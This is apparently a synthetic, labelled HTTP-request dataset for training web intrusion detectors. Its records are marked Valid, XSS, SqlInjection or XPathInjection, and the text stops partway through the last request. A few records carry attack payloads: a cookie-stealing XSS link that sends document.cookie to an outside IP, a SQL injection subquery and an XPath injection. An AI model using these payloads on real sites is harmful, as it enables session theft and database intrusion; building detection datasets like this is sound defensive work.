Upgrade: gto1/9.1, noos/2.9, su2trm/7.6, u0Ntk/3.5
Warning: 345 18.66.75.142 "egj3Lsf4olmsnle" 
X-Forwarded-For: 247.63.27.49
X-Serial-Number: 07250017446349545353
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rEoenae=eevalqf

End - Id: 4742
Start - Id: 15151
class: Valid
GET /hseqhrs8jpMpkoZ/p4PJ/d.htpassM/9dl2c@_M0iQm_eRXs/tdhWsaRota/uwcDa.shtml?thseewnnn2=3elonhosaorii&deqerl=uasTcnodeiOcopyagnnuea+l%7E&deos4aaggt9o=hosdrmgijpyerntna&saodhea8eeoe=ejy-imgSsnae+nu&sSqdw=+&CvVf=nodehtpn&e8spUrboeSnvrc=rtF0Aeeq&.winntDqevalVD=ectelnet&xp_ascriptXYe4ZbMPx=hn+ HTTP/1.0
Host: 9.25.15.168:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: euc-tw, iso-10646-ucs-2;q=0.3, windows-874, x-mac-hebrew;q=0.5
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 7.32.106.85
Cookie: 0biioetph=n-r@1Nq5I_
Cookie2: $Version="501"
Date: Sat, 07 Jul 07 05:25:01 GMT
ETag: "0uLjov9Nslyl1Um57Gg"
Expect: 100-continue
From: fbsohcou@fT8svas.cz
If-Modified-Since: Mon, 30 Oct 06 02:04:13 CET
If-Unmodified-Since: Mon, 12 Oct 09 12:20:25 GMT
If-Match: "nHlCTQRm7y-4@uzkVjRz"
If-None-Match: *
If-Range: Wed, 03 Dec 08 20:08:09 GMT
Max-Forwards: 1
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Basic aW1laXA6dHFmZWRhcA==
Authorization: 8ahea onean=siN7a
Range: -96,366774-,-767
Referer: /fewRheem/trbsr/eseeth/KcfhLat7.jpg
TE: chunked
Trailer: Host
User-Agent: Mozilla/8.1 (Windows; U; Win 9x 9.4; nm-ea; rv:9.3.2) Gecko/51772241
UA-CPU: 68000
UA-Disp: 1668,172,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 4259x4108
Via: FTP/7.9 220.223.136.176:2563, HTTP/7.7 54.187.7.106
Transfer-Encoding: identity
Upgrade: k0e/8.3, ee0yu1/6.5, csixbf/0.4
Warning: 005 www.t3rle2k.tiff:4472 "NonuygzuehRwnartaET" "Mon, 04 Jan 10 20:16:12 GMT"
X-Forwarded-For: 79.50.237.25
X-Serial-Number: 28006910
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15151
Start - Id: 13784
class: Valid
GET /SnEnd7owpcgnjI.php?tqtmt8onS=%29e&nrvilwdeipn=Oobjecta2chttpsrtperltr&x0cidnipddmyi4A=uitttve24jnd1esua&rso2t03d=o+ HTTP/1.1
Host: www.gydlRxrtnc.st
Connection: 1tt70nc
Accept: */*;q=0.7
Accept-Charset: x-mac-ce, iso-2022-kr, cp-950, x-mac-turkish;q=0.4
Accept-Encoding: deflate, gzip;q=0.4, deflate, gzip;q=0.9, compress;q=0.2
Accept-Language: ukn-nertP
Cache-Control: no-cache
Client-ip: 127.177.149.169
Cookie: ppstyleO=h;e6CnqT=87;wq9eode5rehlXn=rk2hatns schilduulibf;ceihs7Oqym4o=2763227;aVsCirbztEla=t;en=2630
Cookie2: $Version="6"
Date: Sun, 12 Apr 09 21:34:01 CET
ETag: "hN05NJsSrpN0per2"
Expect: tsEwE=aods0nh;noasaqpo=cezt
From: kaat@losa.de
If-Modified-Since: Sun, 09 Mar 08 22:28:38 CET
If-Unmodified-Since: Thu, 30 Aug 07 21:43:28 UTC
If-Match: "NGi1rpxQP9hvjehlJ"
If-None-Match: *
If-Range: Mon, 04 Sep 06 06:39:32 CET
Max-Forwards: 0
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Basic bXRTczphaGFwVA==
Range: 4862-
Referer: /dtoF/nsgl30r.cgi
TE: deflate;q=0.9,deflate;q=0.2
Trailer: Cache-Control
User-Agent: Mozilla/9.2 (Windows; U; Win98 4.3; nn-rl; rv:2.2.5) Gecko/33064451
UA-CPU: x86
UA-Disp: 1686,350,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 311x7521
Via: 6.1 www.ftp1wy.tiff:5
Transfer-Encoding: deflate
Upgrade: ssee/8.4, tag/6.0
Warning: 340 12.142.158.70 "icncsoww5Yi" 
X-Forwarded-For: 231.109.137.254
X-Serial-Number: 26172268
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13784
Start - Id: 28937
class: Valid
GET /0lOlcXG/vaJwar/gGtsuname/a5gcuysicpu/I1sock_stream/qlelAac/thP.cgi?tedvTeDknh=ofrompsiek%3D%5C%3E&1iee9tnjtofhd=nreAtN1cumgeqeS&ae=dD1J4TWmaCVB&prilruu=r42Mc HTTP/1.1
Host: www.hCr5h7ae.uk
Connection: kRgfcm5
Accept: video/mpeg, audio/*
Accept-Charset: *
Accept-Encoding: deflate, compress, identity;q=0.6, deflate
Accept-Language: *
Cache-Control: no-transform
Client-ip: 177.45.35.215
Cookie: ieaaa=nu94uKhPUW;hgndn2=xArTd-y5bSw;7c9setdtt5dky=:tlsdimdaswoia;@9LEHn=06708;srr=duhttpsaiko
Cookie2: $Version="7"
Date: Wed, 02 Mar 05 05:01:55 GMT
ETag: W/"r_14kZZVNED_XR.CY"
Expect: r9naTT0=pihtop;7hcs
From: iItoh5s@s6adT2ahhc.cz
If-Modified-Since: Tue, 11 Oct 05 19:49:17 UTC
If-Unmodified-Since: Sun, 12 Jul 09 07:44:06 CET
If-Match: "@l4THu81ImO@p_s7BNq"
If-None-Match: "cr2@ZIgGa9z.7nagVk."
If-Range: "P_yEh8UaIk_CF-efWQ"
Max-Forwards: 4
MIME-Version: 9.9
Pragma: a379vS='ttcTs5'
Proxy-Authorization: Basic c2VUOG9oOTE6Ym5hZm5JMw==
Authorization: Digest username="shka"
Range: 47-52,104931-
Referer: /7iWmrqr/bbuueit.msf
TE: chunked,deflate;q=0.4
Trailer: Upgrade
User-Agent: Mozilla/2.3 (X11; U; SunOS sun4u 9.2; tf-ul; rv:0.4.9) Gecko/47459344
UA-CPU: Sparc
UA-Disp: 3959,584,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 552x545
Via: FTP/9.0 123.62.14.98:086, FTP/7.6 www.jAiovs.shtml, 2.4 www.lRssa.htm
Transfer-Encoding: ecni
Upgrade: cepwa/4.9, ofa/3.0
Warning: 956 46.219.144.237 "etii1isemaettnnau" 
X-Forwarded-For: 108.24.111.61
X-Serial-Number: 7931332
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28937
Start - Id: 46686
class: XSS
GET /loltnyce5da/psol/fnpR42inhaE2zr/otmetoai/mh/brAoceHvk/dz/eytNlenmwnataec3moa/tywO.6pq1DubTQMqLBqj.tiff? HTTP/1.1
Host: www.zraijEgns0.uk
Connection: keep-alive
Accept: video/mpeg;q=0.6
Accept-Charset: *;q=0.7
Accept-Encoding: deflate;q=0.5, deflate;q=0.3
Accept-Language: fanoilby-n;q=0.7, m8d8e-9bu, ddakSs-w
Cache-Control: max-age=30
Client-ip: 150.94.123.100
Cookie: i1naiaatPJPpis=oM-z12r;7ta=<link   rel= "stylesheet    "   href  =  "     javascript: [window.open('http://178.190.62.27/er.pl'+document.cookie);]      "    >;3ir0=17;HQoML=exec@;rcthtelyeastg=1a;axehfutlrT=m7
Cookie2: $Version="191"
Date: Tue, 09 Oct 07 17:11:02 UTC
ETag: W/"PoOlOy_dU_0Z-cj63_GD"
Expect: 100-continue
From: ekionh@nouustph.biz
If-Modified-Since: Wed, 27 Feb 08 23:39:59 GMT
If-Unmodified-Since: Sat, 07 Oct 06 17:19:08 UTC
If-Match: *
If-None-Match: "Oe2_xk5Chy4hiLaw"
If-Range: Sun, 14 Aug 05 10:38:32 GMT
Max-Forwards: 4
MIME-Version: 2.4
Pragma: sredf='oS0nT'
Proxy-Authorization: Basic bmxobm5pOnJyMjRSTw==
Authorization: Digest realm
Range: 88653-1260,8019-4754,415-
Referer: /QinC.mpg
TE: chunked;q=0.1,chunked
Trailer: If-None-Match
User-Agent: oQSvHF http://www.3rrrs4lE.fr
UA-CPU: x86
UA-Disp: 445,3184,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 789x227
Via: 5.8 www.elhdhh.js:52, HTTP/9.7 www.Rokad9.jpg:170
Transfer-Encoding: compress
Upgrade: NNutal/3.3, Zdxhh/3.9
Warning: 142 198.194.142.50 "nwxrb2ahoh62t06" 
X-Forwarded-For: 36.143.183.170
X-Serial-Number: 673414445
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46686
Start - Id: 6700
class: Valid
POST /soshwgagaA/y87xHQJ3b7-nfQ/dhnot80hfop.mspx? HTTP/1.0
Content-Length: 278
Content-Language: wpbeeto,glnAaEtq,shfd50e
Content-Encoding: identity
Content-Location: http://fqag3p.ch/1d07esH/oesih/eihw/r3l9brn/sysei.mpg
Content-MD5: bW50aXN0dHdkc282Y2VBdA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 22 Apr 04 04:43:43 UTC
Last-Modified: Fri, 12 Jan 07 09:00:08 CET
Host: www.rhefog7.net
Connection: keep-alive
Accept: image/jpeg;q=0.4, text/html;q=0.6, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ePirtal-suck;q=0.5, te-w4g4Mamm;q=0.0, tId3t-ulgd8e, IetiswrO-rt
Cache-Control: no-store
Client-ip: 165.169.21.177
Cookie: eeau=4;zOtWpNxBg=qalto8tvr9s;taAnixg=97678;jeuzaer=9IJ3ROQCvfP;5hnb1rm=9;obnst6rezm=yImuAb
Cookie2: $Version="91"
Date: Sat, 24 Apr 04 22:41:54 GMT
ETag: W/"0obECWWXRJ4X.kx6tUM"
Expect: odtyie
From: knj5rt@a7eaent9k.cz
If-Modified-Since: Mon, 26 Feb 07 23:26:58 GMT
If-Unmodified-Since: Fri, 04 Nov 05 08:01:20 CET
If-Match: *
If-None-Match: *
If-Range: "OitpHwfjeZ-G76ot"
Max-Forwards: 0162
MIME-Version: 7.3
Pragma: aoarR='9oaiwd'
Proxy-Authorization: dsaeS r0s5=eu7h
Authorization: Digest response="Ff1D004c36dD4D891E67744DE0b3CfEe"
Range: -5629,33-
Referer: /Mswkiah/iupdfsr/wfhwS4f.jpeg
TE: trailers,gzip
Trailer: If-Unmodified-Since
User-Agent: oJmE8L http://www.weynn.com
UA-CPU: Sparc
UA-Disp: 035,576,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 075x397
Via: 2.6 www.raUdML6a.png, HTTP/0.0 www.dto7tnR.png:518, FTP/7.5 18.174.206.56
Transfer-Encoding: gzip
Upgrade: hrutt/6.0, tbuzs/0.5, iar/0.3, u7e4ae/3.3
Warning: 353 www.f5riuSo.jpeg "dtberrtxEitara" 
X-Forwarded-For: 239.4.241.123
X-Serial-Number: 688311326706532
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rtUu35tAnb=6e@hbe+acc s1\t]l&Oee=tlg&uiaNeseaaryTss=l$rl&rit1uhrtte5s91=rhtbstncsol&en=e3O4t&rhoEpj=pqhfJansnrol0&efnncrohldenrn=eQ0i&ei7encinre=52&ure=mSn&goec=76562&jii8h5zThuaiE=&r&hOO.ah.7LN=3&natoo=(at&tuaheashIxi6o=iDt2swGt4SoelIep&lPNPonerturycsd=xKY1KWMUsr

End - Id: 6700
Start - Id: 27609
class: Valid
GET /8@txm05inWPloH/me4sg1ErB/6FsNb6TI4/f1nC0OUag1qhWlsvAGaM.dll?V6FBIxe=hr3id&sie9aiG=36&daY5bithbagh=97648877&oedhhtex4t=81 HTTP/1.1
Host: www.ocumd4tt.cz
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: iso-8859-2, euc-cn;q=0.1
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-store
Client-ip: 41.242.218.70
Cookie: i9h=\o;adbekOsvjrrt=450293;damaoaDxi=erpeHYYDegqX;1wtgtrN=tYd9r8BqioGk
Cookie2: $Version="380"
Date: Fri, 16 Dec 05 11:47:40 GMT
ETag: W/"2JFkjBVhB8Pi_ph"
Expect: 7ieoel
From: oieTnE@t0eayas.com
If-Modified-Since: Wed, 16 Apr 08 04:03:43 GMT
If-Unmodified-Since: Mon, 06 Jun 05 06:34:58 UTC
If-Match: *
If-None-Match: "u@EPOB2P7n1g5mi9"
If-Range: Sat, 27 Aug 05 20:32:19 CET
Max-Forwards: 13
MIME-Version: 9.4
Pragma: tatromLw=ose
Proxy-Authorization: NTLM dHRmdHRhb3JvYWVSbmVlZWRtdHNvb2RDOW50bnJlaW82dHdObjBlbA==
Authorization: Digest algorithm=MD5-sess
Range: -004669,-26019
Referer: /eriu/tsaaot.cfm
TE: gzip;q=0.7,trailers,trailers
Trailer: Warning
User-Agent: Mozilla/8.3 (X11; U; SunOS sun4u 5.0; sk-po; rv:8.7.9) Gecko/43255593
UA-CPU: x86
UA-Disp: 368,095,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 794x6621
Via: 0.1 178.59.127.94
Transfer-Encoding: deflate
Upgrade: iro/0.9, dcset/6.0, xNs9ee/6.4, 9eaii/4.5, msw/6.6
Warning: 741 www.rweia.css "ro7ottxtixwG8b2" "Mon, 03 Nov 08 11:02:06 CET"
X-Forwarded-For: 177.184.78.1
X-Serial-Number: 189697977036477
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27609
Start - Id: 18073
class: Valid
GET /vbscript@4XyDxkZ9Eh/RmetaGtV8lgf/EpasswdnpA/vxZcMeGxgk/Shhed/aa/hs8n6natsnrah.cfm?eneyyhujne=172231&PdfMY=%2FywiesD3n+%25h&stau=npkash2D4i&ryc=n+eri&ditT6nto8otnrD=1&ee9LAhprrEo=8&iao383nai=oHW45&on9ke=nciOUeie1mT76s9&santjwceRnhhnl=34&edtsakzattlsO=8&aeniaUt6kroN2nT=67274&aneO=6430437092&tkSarjklazelu=pdo6&jaiwunlw1a=7dnmsr3ashnn HTTP/1.1
Host: 90.111.115.236
Connection: fYiecpm
Accept: audio/*, text/xml;q=0.6
Accept-Charset: x-mac-turkish;q=0.5, x-mac-chinesetrad;q=0.9
Accept-Encoding: 
Accept-Language: rsidod-6eha, airnim-Clo
Cache-Control: max-age=5583
Client-ip: 211.175.152.169
Cookie: w81n=ohuo;zK7lsopen5plikeGW=nmmanano
Cookie2: $Version="008"
Date: Tue, 03 Jul 07 10:52:37 GMT
ETag: W/"Gi-l2oTnz3iIFu3djYC"
Expect: ncAe=p7naltx;6z6ac=dnSam2
From: bkly@gN1itutinI.de
If-Modified-Since: Sun, 01 Mar 09 08:36:22 GMT
If-Unmodified-Since: Sat, 11 Jul 09 23:52:53 UTC
If-Match: "mwzXyWFj0GISoxOdKWs4"
If-None-Match: *
If-Range: *
Max-Forwards: 48
MIME-Version: 3.6
Pragma: nbotuitk=vu4ey
Proxy-Authorization: Basic TjVob3YybjphdHRpYmRhbw==
Authorization: NTLM RXRhRUlMdGQ0bWVjT2lnYWVzZmQxb284VWxhYW5zc2Uzd2pybWU=
Range: 955815-429,91164-5504
Referer: /lpOe/clvo/0hetp/RoSorb/iPhRo.pl
TE: gzip,trailers
Trailer: If-Match
User-Agent: Mozilla/2.9 (compatible; Konqueror/9.4; Windows NT; E4rujeewa; oaxheeri; tyer)
UA-CPU: MIPS
UA-Disp: 9424,5309,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 519x975
Via: FTP/8.6 www.ltrore0.html
Transfer-Encoding: edSt; aeAsm1=ysgnEw
Upgrade: pcVooi/8.0, teny6/2.3
Warning: 734 www.ernreSI.shtml "fig7ndengta3" 
X-Forwarded-For: 31.128.239.22
X-Serial-Number: 507009022926065
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 18073
Start - Id: 29513
class: Valid
GET /4D.Y8B/rz2EhWhxQV0uY/rNVYGB/oeJj04/sbeul4kL06nQM8/haWRDzy.0S2LMUL0.sh?mushl=%5D%3Eneetz%3Blaji0ltwexec&ZAuqpBTA5.=4836064974&ineo1t4ruCnba=tjxz&re=siem%2B%3C&Em=dfo&srthanaac=aUpn6nGY&phntattwwedx=ecn HTTP/1.1
Host: 206.179.50.77
Connection: keep-alive
Accept: audio/*;q=0.1, image/*;q=0.6, text/plain;q=0.8
Accept-Charset: *
Accept-Encoding: identity;q=0.7, deflate, compress;q=0.2
Accept-Language: Ne-8, ipz-enn3nAa;q=0.9, ClcGo-7b, ltr-u;q=0.0, entulNr-n
Cache-Control: min-fresh=44
Client-ip: 53.221.31.135
Cookie: rep=telnetrl;wrdshanosa9uin=:h2uvy9oescaY;lhRniitMuhqnEhe=onnlnkioreyEn
Cookie2: $Version="265"
Date: Tue, 20 Jan 04 18:00:16 GMT
ETag: "hgR0jsUgc8FxYqW8"
Expect: 100-continue
From: hSr5h@WteltemeT.com
If-Modified-Since: Mon, 20 Jun 05 17:14:09 GMT
If-Unmodified-Since: Sun, 25 May 08 18:39:00 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 09 Mar 09 23:21:47 UTC
Max-Forwards: 2379
MIME-Version: 2.6
Pragma: egutjpc=o
Proxy-Authorization: Digest algorithm=txrgX
Authorization: Basic cnNucGU6ZVN0aw==
Range: 39-
Referer: http://www.taeloim7.de/r7c8ehn/OesOttT/abxnwe/emiej.jpg
TE: gzip,trailers,gzip
Trailer: From
User-Agent: Mozilla/3.0 (X11; U; Open BSD i586 2.1; td-Vs; rv:4.1.9) Gecko/97742300
UA-CPU: Sparc
UA-Disp: 103,9341,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 641x2619
Via: 2.1 www.Ruya.shtml, HTTP/1.7 www.tdftx5.jpeg, 8.5 44.212.36.135
Transfer-Encoding: deflate
Upgrade: btsTai/0.7, ltOC/6.6, 3ee/0.5, av5o/8.4
Warning: 280 32.122.51.216 "inirOc7els4yq2p5tEw" 
X-Forwarded-For: 41.168.99.7
X-Serial-Number: 801273405
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29513
Start - Id: 42668
class: SqlInjection
GET /a5T/etcNVJ.jpg?jNr7e3cT=93969&sccyg9hrei=3936&nisecEe=hAsesdepoool&NE5mfd=or+++++0%3C%3E%28select+++count%28*%29++from+ganudt%29&ovd=2725&tE=o1tehic4en&rt=979904568&Ohhtrep=01886920&H9rB7H2JVVE9=0%2Fhyqs+u+&rlaafltnnpn=22676980&ethdiwlNOija=46&ir7wengttLve=064573&6pa=udat3 HTTP/1.0
Host: www.tloh.gov:05010
Connection: close
Accept: text/*;q=0.4, image/*;q=0.0, image/png;q=0.0
Accept-Charset: ks_c_5601-1987;q=0.5, euc-jp
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 179.202.66.201
Cookie: set1lo9iesqe2s=9005384813;yaEAegezlso=77957480;dtcmetaa=wonwmwma9non;in=ttTE;Vl1Fte=h<uf
Cookie2: $Version="1"
Date: Tue, 01 Nov 05 23:37:06 GMT
ETag: W/"uROPmH-wt_Abq65K3"
Expect: 100-continue
If-Modified-Since: Fri, 11 Apr 08 04:19:16 GMT
If-Unmodified-Since: Fri, 23 Feb 07 15:18:07 UTC
If-Match: *
If-None-Match: *
If-Range: "WqqhlTpo7fph2PGa1Eu"
Max-Forwards: 2
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Basic eWFlckVMOnI3NHRu
Authorization: sw7t waee=neao
Range: 73002-0
Referer: /aefe/tmthe/htte0.js
TE: chunked;q=0.8,deflate;q=0.0
User-Agent: Mozilla/4.6 (Machintosh; U; PPC 6.9; S1-ao; rv:9.6.3) Gecko/82310256
UA-CPU: PowerPC
UA-Disp: 000,128,8
UA-OS: Windows 98
UA-Color: color32
Via: HTTP/7.4 www.Nc5uulo.js
Transfer-Encoding: compress
Upgrade: eeog/2.4, mitts/3.0, e6e3i/4.3, oaelt/5.7, heNtCn/4.2
Warning: 783 www.chvaonf.html "Tvnj8wlTdlch3nhl" "Mon, 08 Mar 04 04:17:40 CET"
X-Forwarded-For: 113.84.223.129
X-Serial-Number: 328822
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42668
Start - Id: 1095
class: Valid
GET /iglFB/rtoR2teweeckStn1/n5spIscsanoienEb/jwid4zs/w9seh/eval08Ep@iframeE_/uGZYUm.htm?eue9hthmiue=37565007&d39trklcspj=yLNF0&rinZhe2neat=rcN132s&tmrjoEElnRe=9.sQ&7nnNI=Aldlpositionunermauh&oPsystem635W4window.openZ3s=oA2r&lchitkdr4n=446888&mtag6toi0lstv=6rhscnbal7h&tum=%7Ctag&poh9tfemverjOih=08155&to=88 HTTP/1.1
Host: 168.231.123.187
Connection: Simtgifl
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: oan='3P'
Client-ip: 146.13.111.124
Cookie: ennm=Ntvar;omhndshe=9meul1TiAbPaene;TBlZ_bgsoundGsj3LL=6861659;6ehse=89;qjiajnoeceel4hn=kDT4IupCR;auai5m=2Ijsnasht
Cookie2: $Version="356"
Date: Mon, 30 May 05 06:22:31 GMT
ETag: W/"CLMnrtpnGcA_ZQp"
Expect: 100-continue
From: hsrtboi@onni.cz
If-Modified-Since: Thu, 04 Sep 08 15:03:38 UTC
If-Unmodified-Since: Sat, 28 Nov 09 01:44:38 CET
If-Match: "egqQiKLL5YTL7@9"
If-None-Match: "rhgY4nT0Fw@D7SJ5wT"
If-Range: Tue, 02 Jan 07 22:23:31 GMT
Max-Forwards: 0
MIME-Version: 9.9
Pragma: np=wmo
Proxy-Authorization: NTLM b3N4Z2dodHNhcnl5ZWhmcmZvMWd5cnhybm50ZmhyYWVlYm5hN3RvdG5jcw==
Authorization: Basic bmkwaG9DOmV1bmN0
Range: 2006-
Referer: http://www.noegen.com/ldytsaho/ItsnoetW.php4
TE: deflate,deflate;q=0.4,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/8.6 (Windows; U; Windows NT 3.6; oB-ra; rv:6.7.1) Gecko/67774774
UA-CPU: StrongARM
UA-Disp: 465,0552,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8837x3320
Via: HTTP/4.2 www.ecaqhl.shtml
Transfer-Encoding: i9la3; nkoj=lsosdp
Upgrade: n3ex/4.8
Warning: 887 www.ehmEnb04.htm:93 "h3gfakch" 
X-Forwarded-For: 202.230.15.64
X-Serial-Number: 627934
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1095
Start - Id: 50112
class: XPathInjection
PUT /k4hitneOlfa2qoftyQ/eo.cfm? HTTP/1.0
Content-Length: 56
Content-Language: sM
Content-Encoding: deflate
Content-Location: /lee8ofl.pdf
Content-MD5: M2ZoZXM0dXM3ODNyOEFheQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 23 Sep 04 12:02:49 CET
Last-Modified: Fri, 08 Oct 04 22:34:18 UTC
Host: 8.163.210.43
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.8
Cache-Control: max-stale=329
Cookie: eita7=8722556;l7Js=twUptboy;3aotthg9r=62  or   rHs/m/ehu/child::node()[position()=82] or  21=;Mhaving1j@.GOw=8hoihnpaadfi;yH84a8rtsib3bt=684425
Cookie2: $Version="8"
Date: Sun, 08 Feb 04 17:10:45 CET
Expect: zwax
If-Modified-Since: Fri, 29 Sep 06 22:04:34 UTC
If-Unmodified-Since: Tue, 02 Jan 07 12:02:23 CET
If-Match: "9Ds69p5OQRVNKTVpPslw"
Max-Forwards: 5899
MIME-Version: 0.6
Pragma: ef8=dhoe
Range: 03046-717,428-
Referer: http://www.hlrn.com/j9nnar/ectww/Rneah.jsp
TE: trailers,trailers
User-Agent: Mozilla/1.3 (Windows; U; WinNT 5.1; wi-sw; rv:6.3.5) Gecko/83903800
UA-CPU: Sparc
Transfer-Encoding: deflate

ZKoBqHa.HUu4=6&skpysshc=xIslndbueaa&vOtnlinrtcnRl=226009

End - Id: 50112
Start - Id: 9834
class: Valid
GET /mebslwhuqKgVs/o6S/-m.bTeS2U.css? HTTP/1.0
Host: 239.155.110.44
Connection: efSe
Accept: */*;q=0.5
Accept-Charset: iso-8859-9;q=0.6, euc-kr, koi8, iso-8859-4;q=0.8, windows-1252
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: no-transform
Client-ip: 222.11.155.180
Cookie: tAdhwo=flall7paLu2(g;rdeluyeckaR=>hipndvi2=zo;am=70637;iaeifsctnait=kaCLlRTQ
Cookie2: $Version="34"
Date: Sun, 26 Jul 09 23:41:13 CET
ETag: "ToKnTU7bGHwMHSKsu"
Expect: Tiedr
From: ihedktc@senO.gov
If-Modified-Since: Mon, 24 Apr 06 04:13:18 UTC
If-Unmodified-Since: Fri, 13 Feb 04 10:55:18 UTC
If-Match: *
If-None-Match: "_R0vwl1HYGc2WsMH"
If-Range: "95ba-o81k6ivLtOALPv"
Max-Forwards: 570
MIME-Version: 0.1
Pragma: sct=otO
Proxy-Authorization: Digest opaque="eebvad7i"
Authorization: Basic cHNsc2VudGg6dXdNZUdy
Range: 1142-61392
Referer: /EhhmpXy/steJan/reeo/hRegh/ultd.swf
TE: chunked,deflate,trailers
Trailer: Upgrade
User-Agent: Mozilla/3.4 (Machintosh; U; PPC 9.9; rk-hf; rv:3.5.5) Gecko/25458349
UA-CPU: x86
UA-Disp: 822,4443,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 3832x6503
Via: 8.9 31.123.58.99
Transfer-Encoding: gzip
Upgrade: eedP/1.4, o2setj/8.6
Warning: 359 www.omvimkcn.html "tdHnehjio" 
X-Forwarded-For: 59.15.240.43
X-Serial-Number: 09946739061718
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9834
Start - Id: 9602
class: Valid
GET /Ncr/lR/iyzZ_VWLmaqi/rshhpahioe2/iR6J.fQVme5kc.bin?d7ldtlgesruk=ua%7Cul%3Bev+&rAunnieiea=76811&nnhwedta=1 HTTP/1.0
Host: 196.235.230.202
Connection: close
Accept: */*;q=0.4
Accept-Charset: euc-kr;q=0.2, iso-8859-3, us-ascii;q=0.9
Accept-Encoding: *
Accept-Language: bwsrnws-ewReChie, s-tesaia, tq6Se-t;q=0.9, 8yan8h-nhI2sdn;q=0.8
Cache-Control: no-cache
Client-ip: 238.174.206.50
Cookie: 6jeRi6pijoisue=ebt?$;p1E7=Rtyyoe2boxdooiwna;4fqs=ypgX@J1Rr
Cookie2: $Version="815"
Date: Thu, 27 Oct 05 16:00:42 GMT
ETag: "Z0xxwaW4lTUQ8yUbSmS"
Expect: 100-continue
From: wsedel@fte2.org
If-Modified-Since: Thu, 28 Aug 08 08:11:38 UTC
If-Unmodified-Since: Mon, 22 Jan 07 19:59:39 GMT
If-Match: "ddkej_cS24Yf7TL1w5i."
If-None-Match: "1qjb.XKTpPRusGTM"
If-Range: Mon, 02 Mar 09 20:41:26 CET
Max-Forwards: 9
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: siie 8hah=4tdueE
Authorization: NTLM b2hOc2N4OGF0ZXNhaWhyc2FpM2VlYWUyMmxlc25zZHplRGh1cm1zemUycnNoelR0
Range: 218320-0,0-,8-66598
Referer: /f4oiaeh.tiff
TE: chunked;q=0.2
Trailer: Host
User-Agent: aikhhoondSs6
UA-CPU: 68000
UA-Disp: 8659,744,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 7520x0183
Via: 0.7 www.sute.gif, 3.7 30.252.219.156
Transfer-Encoding: deflate
Upgrade: aooeh/2.6
Warning: 004 www.qaG5rro.jpeg "9mp7el34osnrooE0a" "Sat, 23 Aug 08 06:38:14 CET"
X-Forwarded-For: 225.176.97.169
X-Serial-Number: 02037613
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9602
Start - Id: 6462
class: Valid
PUT /tMOq5-Z/98Uab-SS/on4OPiSb/argdmd6lO0.php? HTTP/1.1
Content-Length: 168
Content-Language: 4ewm,yc,nswc2lsw
Content-Encoding: identity
Content-Location: http://sudr.net/imihRech/lmle/osscnhe.bin
Content-MD5: SXVhd3d1b2ZoZTNlaGpvYw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 27 Nov 09 04:31:23 GMT
Last-Modified: Sat, 16 Apr 05 16:22:28 CET
Host: 69.68.47.150
Connection: sryseeE
Accept: video/*;q=0.1, image/jpeg
Accept-Charset: *;q=0.3
Accept-Encoding: identity;q=0.3, deflate
Accept-Language: lyrti-i1;q=0.8, Erpws-ll
Cache-Control: no-store
Client-ip: 114.91.36.242
Cookie: nAtinswptyt=lrtmpliken;wviePs=dmtepAoeshitnfs;nn8df=6ftpeaosemN<e+i;3H5zPH7=oeImegrn;eRi4waea1ytse=0767
Cookie2: $Version="6"
Date: Thu, 22 May 08 15:56:06 CET
